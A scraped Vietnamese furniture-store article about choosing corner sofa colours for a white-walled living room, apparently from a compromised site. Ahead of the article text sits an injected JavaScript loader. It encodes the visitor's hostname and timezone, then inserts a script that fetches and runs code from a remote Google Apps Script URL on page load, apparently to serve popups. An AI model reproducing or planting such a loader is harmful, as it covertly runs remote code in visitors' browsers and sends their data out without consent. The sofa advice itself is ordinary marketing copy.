var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Chọn màu sắc ghế sofa góc cho phòng khách sơn tường trắng

Bạn sử dụng sơn tường trắng cho toàn bộ phòng khách và muốn chọn màu sắc ghế sofa góc sao cho thật thích hợp. Bạn đang băn khoăn vấn đề này? Hãy cùng tìm hiểu ngay sau đây.

Nếu như bạn muốn sử dụng mẫu sofa góc đẹp cho căn phòng màu trắng của mình thì chắc chắn không thể nào bỏ qua yếu tố màu sắc. Màu sắc sofa cần phải phù hợp và hài hòa mới đem lại giá trị thẩm mĩ cao.

Chọn màu sắc ghế sofa góc cho phòng khách màu trắng

Sofa góc màu trung tính

Những bộ sofa gam màu trung tính như vàng nhạt, xám, lông chuột… không bao giờ lỗi mốt, hợp với nhiều không gian và cực kì dễ phối hợp. Chính vì vậy phòng khách có sơn tường màu trắng không thể bỏ qua sofa gam màu này. Màu trung tính đem lại cảm giác sạch sẽ và vẫn vô cùng sang trọng, đẳng cấp. Nó cũng cực kì dễ phối hợp với thảm sofa các gam màu sắc khác nhau mà không bị lệch tone.

màu sắc ghế sofa góc
Ghế sofa góc màu trung tính rất hợp với phòng khách sơn tường màu trắng

Sofa góc cùng màu sơn tường

Bạn có thể chọn bộ sofa góc màu trắng cùng với màu của sơn tường. Đây là cách chọn lựa an toàn, gia chủ sẽ không phải đau đầu trong việc kết hợp sao cho hài hòa nhất. Điều này làm cho không gian trở nên đồng bộ, sang, sạch sẽ và ấn tượng hơn. Bạn có thể chọn bộ sofa nhập khẩu bằng da gam màu trắng là gợi ý không thể bỏ qua.

màu sắc ghế sofa góc
Phòng khách sáng và thoáng với sơn tường và sofa cùng màu

Sofa góc màu nổi bật

Với sơn tường màu trắng bạn cũng có thể chọn những bộ sofa gam màu nổi bật như xanh đậm, đỏ, vàng, cam… Vì sơn tường trắng nên những bộ sofa này cũng sẽ không tạo nên sự bí bách, khó chịu. Ngược lại nó lại tạo được nét ấn tượng riêng, nổi bật và thu hút sự chú ý của mọi người.

màu sắc ghế sofa góc
Sofa màu đỏ cho phòng khách màu trắng nổi bật

Với phòng khách có sơn tường màu trắng thì việc chọn lựa màu sắc ghế sofa cũng không quá khó khăn. Để có sự chọn lựa tốt nhất hãy đến ngay Nội Thất Xinh Hà Nội.

=> THAM KHẢO:   Mua sofa nhập khẩu chính hãng tại Hà Nội tốt nhất